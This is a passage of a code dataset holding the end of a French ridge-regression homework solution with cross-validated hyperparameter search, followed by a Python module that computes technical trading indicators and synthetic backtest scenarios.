variable self.M\n\n X: vecteur de donnees\n t: vecteur de cibles\n \"\"\"\n # AJOUTER CODE ICI\n M_min = 
1\n M_max = 201\n lamb_min = 0.0001\n lamb_max = 1\n lambs = list(np.geomspace(lamb_min, lamb_max, num=20))\n k = 10\n\n\n # Liste des items\n liste_indices = np.arange(len(X), dtype=np.int)\n # Pas nécéssaire de shuffle ?\n np.random.shuffle(liste_indices)\n\n # Split les indices en k \"chunks\"\n folds = np.array_split(liste_indices, 10)\n\n best_mean_error = np.inf\n\n for M in range(M_min, M_max):\n self.M = M\n\n for lamb in lambs:\n self.lamb = lamb\n\n erreur = np.zeros(k)\n for j in range(k):\n # Le chunk d'indices est celui de validation\n valid_indices = folds[j]\n # Les autres chunks serviront à l'entrainement\n train_indices = np.concatenate([f for i, f in enumerate(folds) if i != j])\n\n # Sélection des données\n x_valid = X[liste_indices[valid_indices]]\n t_valid = t[liste_indices[valid_indices]]\n x_train = X[liste_indices[train_indices]]\n t_train = t[liste_indices[train_indices]]\n\n # Entrainement et calcul d'erreur\n self.entrainement(x_train, t_train)\n pred_valid = np.array([self.prediction(x) for x in x_valid])\n erreur[j] = np.sum(self.erreur(t_valid, pred_valid))\n\n mean_error = np.mean(erreur)\n if mean_error <= best_mean_error:\n best_mean_error = mean_error\n best_M = M\n best_lamb = lamb\n\n self.M = best_M\n self.lamb = best_lamb\n print('M trouvé: {}'.format(self.M))\n print('lamb trouvé: {}'.format(self.lamb))\n\n def entrainement(self, X, t, using_sklearn=False):\n \"\"\"\n Entraîne la regression lineaire sur l'ensemble d'entraînement forme des\n entrees ``X`` (un tableau 2D Numpy, ou la n-ieme rangee correspond à l'entree\n x_n) et des cibles ``t`` (un tableau 1D Numpy ou le\n n-ieme element correspond à la cible t_n). L'entraînement doit\n utiliser le poids de regularisation specifie par ``self.lamb``.\n\n Cette methode doit assigner le champs ``self.w`` au vecteur\n (tableau Numpy 1D) de taille D+1, tel que specifie à la section 3.1.4\n du livre de Bishop.\n\n Lorsque using_sklearn=True, vous devez utiliser la classe \"Ridge\" de\n la librairie sklearn (voir http://scikit-learn.org/stable/modules/linear_model.html)\n\n Lorsque using_sklearn=Fasle, vous devez implementer l'equation 3.28 du\n livre de Bishop. Il est suggere que le calcul de ``self.w`` n'utilise\n pas d'inversion de matrice, mais utilise plutôt une procedure\n de resolution de systeme d'equations lineaires (voir np.linalg.solve).\n\n Aussi, la variable membre self.M sert à projeter les variables X vers un espace polynomiale de degre M\n (voir fonction self.fonction_base_polynomiale())\n\n NOTE IMPORTANTE : lorsque self.M <= 0, il faut trouver la bonne valeur de self.M\n\n \"\"\"\n\n # AJOUTER CODE ICI\n if self.M <= 0:\n self.recherche_hyperparametre(X, t)\n\n phi_X = self.fonction_base_polynomiale(X)\n\n if using_sklearn:\n reg = linear_model.Ridge(alpha=self.lamb, fit_intercept=False)\n reg.fit(phi_X, t)\n self.w = reg.coef_\n else:\n mat = self.lamb*np.identity(self.M+1) + np.dot(phi_X.T, phi_X)\n vec = np.dot(phi_X.T, t)\n self.w = np.linalg.solve(mat, vec)\n\n def prediction(self, x):\n \"\"\"\n Retourne la prediction de la regression lineaire\n pour une entree, representee par un tableau 1D Numpy ``x``.\n\n Cette methode suppose que la methode ``entrainement()``\n a prealablement ete appelee. 
Elle doit utiliser le champs ``self.w``\n afin de calculer la prediction y(x,w) (equation 3.1 et 3.3).\n \"\"\"\n # AJOUTER CODE ICI\n return np.dot(self.fonction_base_polynomiale(x), self.w)\n\n @staticmethod\n def erreur(t, prediction):\n \"\"\"\n Retourne l'erreur de la difference au carre entre\n la cible ``t`` et la prediction ``prediction``.\n \"\"\"\n # AJOUTER CODE ICI\n return (t-prediction)**2\n", "repo_name": "AntoineTheb/ift888", "sub_path": "Q1-pt2/solution_regression.py", "file_name": "solution_regression.py", "file_ext": "py", "file_size_in_byte": 5595, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.isscalar", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.geomspace", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.array_split", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.linear_model", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.identity", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.linalg.solve", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 143, "usage_type": "call"}]} +{"seq_id": "69930025127", "text": "import pandas as pd\nfrom parse import parse\nfrom stockstats import StockDataFrame as Sdf\nfrom finta import TA\nimport ta\nfrom collections import OrderedDict\nimport numpy as np\nfrom . import indicators_vsa as vsa\nfrom . import indicators_flabeling as flabeling\nfrom . import indicators_supertrend as supertrend\nfrom . import indicators_tradingview as tv\nfrom . 
import utils\n\ndef get_window_size(indicator):\n trend_parsed = parse('trend_{}d', indicator)\n sma_parsed = parse('sma_{}', indicator)\n ema_parsed = parse('ema_{}', indicator)\n wma_parsed = parse('wma_{}', indicator)\n\n if indicator in [\"open\", \"close\", \"high\", \"low\"]:\n return 1\n\n elif trend_parsed != None and trend_parsed[0].isdigit():\n return int(trend_parsed[0])\n\n elif sma_parsed != None and sma_parsed[0].isdigit():\n return int(sma_parsed[0])\n\n elif ema_parsed != None and ema_parsed[0].isdigit():\n return int(ema_parsed[0])\n\n elif wma_parsed != None and wma_parsed[0].isdigit():\n return int(wma_parsed[0])\n\n elif indicator in ['macd', 'macds', 'macdh']:\n return 26\n\n elif indicator == \"bbands\":\n return 20\n\n elif indicator in [\"rsi_30\", \"cci_30\", \"dx_30\"]:\n return 30\n \n elif indicator == \"rsi\":\n return 14\n\n elif indicator == 'williams_%r':\n return 14\n\n elif indicator in ['stoch_%k', 'stoch_%d']:\n return 14\n \n elif indicator == 'er':\n return 10\n \n elif indicator == 'stc':\n return 50\n \n elif indicator == 'atr':\n return 14\n \n elif indicator == 'adx':\n return 14\n \n elif indicator == 'roc':\n return 12\n\n elif indicator == 'mom':\n return 10\n\n elif indicator == 'simple_rtn':\n return 1\n\n elif indicator == 'labeling':\n return 20\n\n elif indicator.startswith('tv_'):\n return 0\n\n elif indicator.startswith('close_synthetic_'):\n return 0\n\n elif '_shift_' in indicator:\n lst_split = indicator.split(\"_\")\n if len(lst_split) == 3:\n return int(lst_split[2])\n else:\n return 0\n\n elif indicator == 'vsa':\n return 60\n\n elif indicator == \"super_trend_direction\":\n return 15\n\n print(\"unknown window size for \", indicator)\n return 0\n\ndef get_max_window_size(indicators):\n if len(indicators) == 0:\n return 0\n\n if isinstance(indicators, list):\n return max([get_window_size(indicator) for indicator in indicators])\n elif isinstance(indicators, dict):\n # if the parameters of all the indicators are dictionaries...\n #window_sizes = [parameters[\"window_size\"] if \"window_size\" in parameters else get_window_size(indicator) for indicator, parameters in indicators.items()]\n # but just in case there is something else :\n window_sizes = [0]\n for indicator in indicators:\n parameters = indicators[indicator]\n if isinstance(parameters, dict):\n parameters = indicators[indicator]\n if \"window_size\" in parameters:\n window_size = parameters[\"window_size\"]\n if isinstance(window_size, str):\n window_size = int(window_size)\n else:\n window_size = get_window_size(indicator)\n window_sizes.append(window_size)\n elif isinstance(parameters, int):\n window_sizes.append(parameters)\n else:\n window_size = get_window_size(indicator)\n window_sizes.append(window_size)\n\n return max(window_sizes)\n\n return 0\n\ndef get_feature_from_fdp_features(fdp_features):\n lst_features = []\n for feature in fdp_features:\n if len(fdp_features[feature]) == 0:\n lst_features.append(feature)\n elif fdp_features[feature] != None:\n lst_param = list(fdp_features[feature])\n if \"id\" in lst_param:\n id = \"_\" + fdp_features[feature][\"id\"]\n else:\n id = \"\"\n if \"n\" in lst_param:\n n = \"n\" + fdp_features[feature][\"n\"] + \"_\"\n else:\n n = \"\"\n if not feature.startswith(\"postprocess\"):\n lst_features.append(fdp_features[feature][\"indicator\"] + id)\n if \"output\" in lst_param:\n for output in fdp_features[feature][\"output\"]:\n lst_features.append(output + id)\n if \"indicator\" in fdp_features[feature] \\\n and 
fdp_features[feature][\"indicator\"] == \"shift\" \\\n and \"input\" in lst_param:\n for input in fdp_features[feature][\"input\"]:\n lst_features.append(n + input + id)\n return lst_features\n\ndef compute_indicators(df, indicators, keep_only_requested_indicators = False, params = None):\n if not isinstance(df, pd.DataFrame):\n return df\n\n # manage indicators as an array but it is converted into a dictionary\n if isinstance(indicators, list):\n indicators = dict.fromkeys(indicators, {})\n\n # call stockstats\n stock = Sdf.retype(df.copy())\n\n if isinstance(indicators, dict):\n keep_indicators = get_feature_from_fdp_features(indicators)\n else:\n keep_indicators = indicators\n\n # compute the indicators\n columns = list(df.columns)\n\n # be sure postprocess are treated at the end\n oindicators = OrderedDict()\n for indicator, parameters in indicators.items():\n if not indicator.startswith(\"postprocess\"):\n oindicators[indicator] = parameters\n for indicator, parameters in indicators.items():\n if indicator.startswith(\"postprocess\"):\n oindicators[indicator] = parameters\n \n\n for indicator, parameters in oindicators.items():\n if indicator in columns:\n continue\n \n # check if one deals with a postprocess\n if indicator.startswith(\"postprocess\"):\n if \"input\" in parameters and \"indicator\" in parameters and \"n\" in parameters:\n indicator = parameters[\"indicator\"]\n id = \"\"\n if \"id\" in parameters:\n id = \"_\"+parameters[\"id\"]\n n = parameters[\"n\"]\n if isinstance(n, str):\n n = int(n)\n input = [item+id for item in parameters[\"input\"]]\n if isinstance(input, list):\n if all(item in list(df.columns) for item in input):\n df = utils.get_n_columns(df, input, n)\n\n # check if the indicator is overriden\n if \"indicator\" in parameters:\n indicator = parameters[\"indicator\"]\n\n # prepare the suffix if an id is specified\n suffix = \"\"\n if 'id' in parameters:\n suffix = \"_\"+parameters[\"id\"]\n\n trend_parsed = parse('trend_{}d', indicator)\n sma_parsed = parse('sma_{}', indicator)\n ema_parsed = parse('ema_{}', indicator)\n wma_parsed = parse('wma_{}', indicator)\n slope_parsed = parse('slope_{}', indicator)\n\n if trend_parsed != None and trend_parsed[0].isdigit():\n seq = int(trend_parsed[0])\n diff = df[\"close\"] - df[\"close\"].shift(seq)\n df[\"trend_\"+str(seq)+\"d\"+ suffix] = diff.gt(0).map({False: 0, True: 1})\n\n elif indicator == \"sma\":\n seq = 10\n if \"window_size\" in parameters:\n seq = parameters[\"window_size\"]\n if isinstance(seq, str):\n seq = int(seq)\n df[\"sma\"+ suffix] = TA.SMA(stock, seq).copy()\n\n elif indicator == \"ema\":\n period = 10\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n # df[\"ema\"+ suffix] = TA.EMA(stock, period = period).copy()\n df[\"ema\"+ suffix] = ta.trend.ema_indicator(close=df['close'], window=period).copy()\n\n elif indicator == 'willr':\n period = 14\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n df['willr'] = ta.momentum.williams_r(high=df['high'], low=df['low'], close=df['close'], lbp=period).copy()\n\n elif indicator == 'willr_trend':\n period = 14\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n\n predict_window = 4\n if \"pred_window_size\" in parameters:\n predict_window = parameters[\"pred_window_size\"]\n if isinstance(predict_window, str):\n 
predict_window = int(predict_window)\n\n df['willr_trend'] = ta.momentum.williams_r(high=df['high'], low=df['low'], close=df['close'], lbp=period).copy()\n\n df['willr_trend' + suffix] = df['willr_trend' + suffix].shift(-1)\n df.at[df.index[-1], \"willr_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'willr_trend' + suffix, predict_window)\n\n df[\"willr_trend\" + suffix] = utils.discret_coef(coef)\n\n elif indicator == \"wma\":\n period = 10\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n df[\"wma\"+ suffix] = TA.WMA(stock, period = period).copy()\n\n elif sma_parsed != None and sma_parsed[0].isdigit():\n seq = int(sma_parsed[0])\n df[\"sma_\"+str(seq)+ suffix] = TA.SMA(stock, seq).copy()\n\n elif ema_parsed != None and ema_parsed[0].isdigit():\n period = int(ema_parsed[0])\n df[\"ema_\"+str(period)+ suffix] = TA.EMA(stock, period = period).copy()\n\n elif wma_parsed != None and wma_parsed[0].isdigit():\n period = int(wma_parsed[0])\n df[\"wma_\"+str(period)+ suffix] = TA.WMA(stock, period = period).copy()\n\n elif slope_parsed != None and slope_parsed[0].isdigit():\n period = int(slope_parsed[0])\n df[\"slope_\"+str(period)+ suffix] = df[\"close\"].rolling(window=period).apply(lambda x: np.polyfit(range(len(x)), x, 1)[0])\n\n elif indicator == 'macd':\n df['macd' + suffix] = stock.get('macd').copy() # from stockstats\n #df['macd'] = TA.MACD(stock)['MACD'].copy() # from finta\n\n elif indicator == 'macds':\n df['macds' + suffix] = stock.get('macds').copy() # from stockstats\n\n elif indicator == 'macdh':\n df['macdh' + suffix] = stock.get('macdh').copy() # from stockstats\n\n elif indicator == 'bbands':\n bbands = TA.BBANDS(stock).copy()\n df = pd.concat([df, bbands], axis = 1)\n df.rename(columns={'BB_UPPER': 'bb_upper' + suffix}, inplace=True)\n df.rename(columns={'BB_MIDDLE': 'bb_middle' + suffix}, inplace=True)\n df.rename(columns={'BB_LOWER': 'bb_lower' + suffix}, inplace=True)\n\n elif indicator == 'rsi':\n rsi_window = 14\n if \"window_size\" in parameters:\n rsi_window = parameters[\"window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n df['rsi' + suffix] = ta.momentum.rsi(close=df[\"close\"], window=rsi_window)\n\n elif indicator == 'stoch_rsi':\n rsi_window = 14\n smooth_k = 3\n smooth_d = 3\n if \"stoch_rsi_window_size\" in parameters:\n rsi_window = parameters[\"stoch_rsi_window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n\n df['stoch_rsi' + suffix] = ta.momentum.stochrsi(close=df[\"close\"]\n , window=rsi_window) * 100\n df['stoch_rsi_k' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_k() * 100\n df['stoch_rsi_d' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_d() * 100\n elif indicator == 'stoch_rsi_pred':\n rsi_window = 14\n if \"stoch_rsi_window_size\" in parameters:\n rsi_window = parameters[\"stoch_rsi_window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n \n predict_window = 4\n if \"pred_window_size\" in parameters:\n predict_window = parameters[\"pred_window_size\"]\n if isinstance(predict_window, str):\n predict_window = int(predict_window)\n \n df['stoch_rsi_pred' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"], window=rsi_window).stochrsi() * 100\n df['stoch_rsi_pred' + suffix] = df['stoch_rsi_pred' + suffix].shift(-1)\n df.at[df.index[-1], \"stoch_rsi_pred\" + 
suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_pred' + suffix, predict_window)\n if predict_val < 0:\n predict_val = 0\n elif predict_val > 100:\n predict_val = 100\n df.at[df.index[-1], \"stoch_rsi_pred\" + suffix] = predict_val\n\n elif indicator == 'stoch_rsi_trend':\n rsi_window = 14\n if \"stoch_rsi_window_size\" in parameters:\n rsi_window = parameters[\"stoch_rsi_window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n\n predict_window = 4\n if \"pred_window_size\" in parameters:\n predict_window = parameters[\"pred_window_size\"]\n if isinstance(predict_window, str):\n predict_window = int(predict_window)\n \n df['stoch_rsi_trend' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi() * 100\n df['stoch_rsi_k_trend' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_k() * 100\n df['stoch_rsi_d_trend' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_d() * 100\n df['stoch_rsi_trend' + suffix] = df['stoch_rsi_trend' + suffix].shift(-1)\n df['stoch_rsi_k_trend' + suffix] = df['stoch_rsi_k_trend' + suffix].shift(-1)\n df['stoch_rsi_d_trend' + suffix] = df['stoch_rsi_d_trend' + suffix].shift(-1)\n\n df.at[df.index[-1], \"stoch_rsi_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_trend' + suffix, predict_window)\n df[\"stoch_rsi_trend\" + suffix] = utils.discret_coef(coef)\n\n df.at[df.index[-1], \"stoch_rsi_k_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_k_trend' + suffix, predict_window)\n df[\"stoch_rsi_k_trend\" + suffix] = utils.discret_coef(coef)\n\n df.at[df.index[-1], \"stoch_rsi_d_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_d_trend' + suffix, predict_window)\n df[\"stoch_rsi_d_trend\" + suffix] = utils.discret_coef(coef)\n\n elif indicator == 'atr':\n atr_window = 14\n if \"window_size\" in parameters:\n atr_window = parameters[\"window_size\"]\n if isinstance(atr_window, str):\n atr_window = int(atr_window)\n df['atr' + suffix] = ta.volatility.AverageTrueRange(high=df[\"high\"], low=df[\"low\"], close=df[\"close\"], window=atr_window).average_true_range()\n\n elif indicator == 'ao':\n ao_window_1 = 6\n if \"ao_window_1\" in parameters:\n ao_window_1 = parameters[\"ao_window_1\"]\n if isinstance(ao_window_1, str):\n ao_window_1 = int(ao_window_1)\n\n ao_window_2 = 22\n if \"ao_window_2\" in parameters:\n ao_window_2 = parameters[\"ao_window_2\"]\n if isinstance(ao_window_2, str):\n ao_window_2 = int(ao_window_2)\n\n df['ao'] = ta.momentum.awesome_oscillator(df['high'], df['low'], window1=ao_window_1, window2=ao_window_2).copy()\n \n elif indicator == 'ao_trend':\n ao_window_1 = 6\n if \"ao_window_1\" in parameters:\n ao_window_1 = parameters[\"ao_window_1\"]\n if isinstance(ao_window_1, str):\n ao_window_1 = int(ao_window_1)\n\n ao_window_2 = 22\n if \"ao_window_2\" in parameters:\n ao_window_2 = parameters[\"ao_window_2\"]\n if isinstance(ao_window_2, str):\n ao_window_2 = int(ao_window_2)\n \n predict_window = 4\n if \"pred_window_size\" in parameters:\n predict_window = parameters[\"pred_window_size\"]\n if isinstance(predict_window, str):\n predict_window = int(predict_window)\n\n df['ao_trend'] = ta.momentum.awesome_oscillator(df['high'], df['low'], window1=ao_window_1, window2=ao_window_2).copy()\n df['ao_trend' + suffix] = df['ao_trend' + 
suffix].shift(-1)\n df.at[df.index[-1], \"ao_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'ao_trend' + suffix, predict_window)\n \n df[\"ao_trend\" + suffix] = utils.discret_coef(coef)\n\n elif indicator == 'bollinger':\n bol_window = 100\n if \"window_size\" in parameters:\n bol_window = parameters[\"window_size\"]\n if isinstance(bol_window, str):\n bol_window = int(bol_window)\n bol_std = 2.25\n if \"bol_std\" in parameters:\n bol_std = parameters[\"bol_std\"]\n if isinstance(bol_std, str):\n bol_std = float(bol_std)\n long_ma_window = 500\n\n bol_band = ta.volatility.BollingerBands(close=df[\"close\"], window=bol_window, window_dev=bol_std)\n df[\"lower_band\"+ suffix] = bol_band.bollinger_lband()\n df[\"higher_band\"+ suffix] = bol_band.bollinger_hband()\n df[\"ma_band\"+ suffix] = bol_band.bollinger_mavg()\n df['long_ma' + suffix] = ta.trend.sma_indicator(close=df['close'], window=long_ma_window)\n\n df['bollinger' + suffix] = True # bollinger indicator trigger\n\n elif indicator == 'envelope':\n envelope_window = 5\n if \"window_size\" in parameters:\n envelope_window = parameters[\"ma_window_size\"]\n if isinstance(envelope_window, str):\n envelope_window = int(envelope_window)\n\n ma = \"sma\"\n if \"ma\" in parameters:\n ma = parameters[\"ma\"]\n if not isinstance(\"ma\", str):\n ma = \"sma\"\n\n ma_offset_1 = 3\n ma_offset_2 = 5\n ma_offset_3 = 7\n if \"ma_offset_1\" in parameters:\n ma_offset_1 = parameters[\"ma_offset_1\"]\n if isinstance(ma_offset_1, str):\n ma_offset_1 = float(ma_offset_1)\n if \"ma_offset_2\" in parameters:\n ma_offset_2 = parameters[\"ma_offset_2\"]\n if isinstance(ma_offset_2, str):\n ma_offset_2 = float(ma_offset_2)\n if \"ma_offset_3\" in parameters:\n ma_offset_3 = parameters[\"ma_offset_3\"]\n if isinstance(ma_offset_3, str):\n ma_offset_3 = float(ma_offset_3)\n\n if ma == \"sma\":\n df[\"ma_base\"+ suffix] = ta.trend.SMAIndicator(close=df[\"close\"], window=envelope_window).sma_indicator()\n # df[\"ma_base\"+ suffix] = ta.trend.sma_indicator(close=df[\"close\"], window=envelope_window)\n # df[\"ma_base\"+ suffix] = TA.SMA(df, envelope_window, \"close\")\n\n predict_val, coef = utils.predict_next_LinearRegression(df, \"ma_base\"+ suffix, envelope_window)\n df.at[df.index[-1], \"ma_base\" + suffix] = predict_val\n\n df[\"envelope_long_1\"+ suffix] = df[\"ma_base\"+ suffix] - df[\"ma_base\"+ suffix] * ma_offset_1 / 100\n df[\"envelope_long_2\"+ suffix] = df[\"ma_base\"+ suffix] - df[\"ma_base\"+ suffix] * ma_offset_2 / 100\n df[\"envelope_long_3\"+ suffix] = df[\"ma_base\"+ suffix] - df[\"ma_base\"+ suffix] * ma_offset_3 / 100\n\n df[\"envelope_short_1\"+ suffix] = df[\"ma_base\"+ suffix] + df[\"ma_base\"+ suffix] * ma_offset_1 / 100\n df[\"envelope_short_2\"+ suffix] = df[\"ma_base\"+ suffix] + df[\"ma_base\"+ suffix] * ma_offset_2 / 100\n df[\"envelope_short_3\"+ suffix] = df[\"ma_base\"+ suffix] + df[\"ma_base\"+ suffix] * ma_offset_3 / 100\n\n df['envelope' + suffix] = True # bollinger indicator trigger\n\n elif indicator == 'synthetic_bollinger':\n df.reset_index(inplace=True)\n # TEST SCENARIO\n df['close'] = 10\n df[\"lower_band\"+ suffix] = 9\n df[\"higher_band\"+ suffix] = 11\n df[\"ma_band\"+ suffix] = 9.5\n df[\"long_ma\"+ suffix] = 7\n\n t = 1000 + 50\n t_plus = 25\n df.at[t, \"close\"] = df[\"higher_band\"+ suffix].iloc[t] + 0.01\n # OPEN LONG\n df['close'] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, 
df[\"higher_band\"+ suffix] + 1, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 1.5, df['close'])\n # CLOSE LONG\n t = t + t_plus\n df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 1, df['ma_band' + suffix])\n\n # OPEN SHORT\n t = t + t_plus\n df['lower_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 0.6, df['lower_band' + suffix])\n df['long_ma+ suffix'] = np.where(df.index >= t, df[\"close\"] + 0.3, df['long_ma' + suffix])\n\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 1, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 1.5, df['close'])\n t = t + t_plus\n # CLOSE SHORT\n df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] - 2.5, df['ma_band' + suffix])\n\n # OPEN LONG\n t = t + t_plus\n df['long_ma' + suffix] = np.where(df.index >= t, df[\"close\"] - 0.3, df['long_ma' + suffix])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 1, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 1.5, df['close'])\n # CLOSE LONG\n t = t + t_plus\n df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 2, df['ma_band' + suffix])\n\n t = t + t_plus\n df['higher_band' + suffix] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 4, df['higher_band' + suffix])\n\n # OPEN SHORT\n t = t + t_plus\n df['lower_band' + suffix] = np.where(df.index >= t, df[\"close\"] - 1, df['lower_band' + suffix])\n t = t + t_plus\n df['lower_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 1, df['lower_band' + suffix])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 1, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 1.5, df['close'])\n # CLOSE SHORT BY MA_BAND ALREADY BELOW CLOSE\n\n # OPEN LONG\n t = t + t_plus\n df['higher_band' + suffix] = np.where(df.index >= t, df[\"higher_band\"+ suffix] - 4, df['higher_band' + suffix])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 1, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 1.5, df['close'])\n\n # CLOSE LONG\n t = t + t_plus\n df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 0.5, df['ma_band' + suffix])\n\n # END OF SCENARIO\n df.set_index(['timestamp'], inplace=True, drop=True)\n df = utils.get_n_columns(df, [\"ma_band\"+ suffix, \"lower_band\"+ suffix, \"higher_band\"+ suffix, \"close\"], 1)\n\n df['syntheticbollinger' + suffix] = True # bollinger indicator trigger\n\n elif indicator == 'cci_30':\n df['cci_30' + suffix] = stock.get('cci_30').copy()\n \n elif indicator == 'dx_30':\n df['dx_30' + suffix] = stock.get('dx_30').copy()\n \n elif indicator == 'williams_%r':\n df['williams_%r' + suffix] = TA.WILLIAMS(stock).copy()\n\n elif indicator == 'stoch_%k':\n df['stoch_%k' + suffix] = TA.STOCH(stock).copy()\n\n elif indicator == 'stoch_%d':\n df['stoch_%d' + suffix] = TA.STOCHD(stock).copy()\n \n elif indicator == 'er':\n df['er' + suffix] = 
TA.ER(stock).copy()\n \n elif indicator == 'stc':\n df['stc' + suffix] = TA.STC(stock).copy()\n \n elif indicator == 'adx':\n df['adx' + suffix] = TA.ADX(stock).copy()\n \n elif indicator == 'roc':\n df['roc' + suffix] = TA.ROC(stock).copy()\n\n elif indicator == 'mom':\n df['mom' + suffix] = TA.MOM(stock).copy()\n\n elif indicator == 'simple_rtn':\n df['simple_rtn' + suffix] = df['close'].pct_change()\n\n elif indicator == 'labeling':\n df = flabeling.data_labeling(df, params)\n\n elif indicator.startswith('tv_'):\n df[indicator] = tv.get_recommendation(df, indicator, params)\n\n # shift feature: column_shift_nb ex: close_shift_5\n elif '_shift_' in indicator:\n lst_split = indicator.split(\"_\")\n df[indicator+ suffix] = df[lst_split[0]].shift(int(lst_split[2]), axis=0)\n\n elif indicator == 'vsa':\n days = [1, 2, 3, 5, 20, 40, 60]\n df = vsa.create_bunch_of_vsa_features(df, days)\n df['outcomes_vsa' + suffix] = df.close.pct_change(-1)\n\n elif indicator == \"super_trend_direction\":\n st = supertrend.SuperTrend(\n df['high'], \n df['low'], \n df['close'], \n 15, # self.st_short_atr_window\n 5 # self.st_short_atr_multiplier\n )\n \n df['super_trend_direction' + suffix] = st.super_trend_direction()\n #df['super_trend_direction'] = df['super_trend_direction'].shift(1)\n\n elif indicator == \"super_reversal\":\n short_ema_window = 5\n long_ema_window = 15\n # -- Populate indicators --\n super_trend = supertrend.SuperTrend(\n df['high'],\n df['low'],\n df['close'],\n long_ema_window,\n short_ema_window\n )\n df['super_trend_direction' + suffix] = super_trend.super_trend_direction()\n df['ema_short' + suffix] = ta.trend.ema_indicator(close=df['close'], window=short_ema_window)\n df['ema_long' + suffix] = ta.trend.ema_indicator(close=df['close'], window=long_ema_window)\n\n df = utils.get_n_columns(df, [\"super_trend_direction\"+ suffix, \"ema_short\"+ suffix, \"ema_long\"+ suffix], 1)\n df['superreversal' + suffix] = True # super_reversal indicator trigger\n df['super_reversal' + suffix] = True # super_reversal indicator trigger\n\n elif indicator == 'syntheticsuperreversal':\n df.reset_index(inplace=True)\n # TEST SCENARIO\n df['close'] = 5\n df[\"high\"] = 10\n df[\"low\"] = 17\n df[\"n1_ema_short\"+ suffix] = 14\n df[\"n1_ema_long\"+ suffix] = 15\n df[\"n1_super_trend_direction\"+ suffix] = False\n\n # OPEN LONG AT t\n t = 100 + 400\n df['n1_ema_short' + suffix] = np.where(df.index >= t, 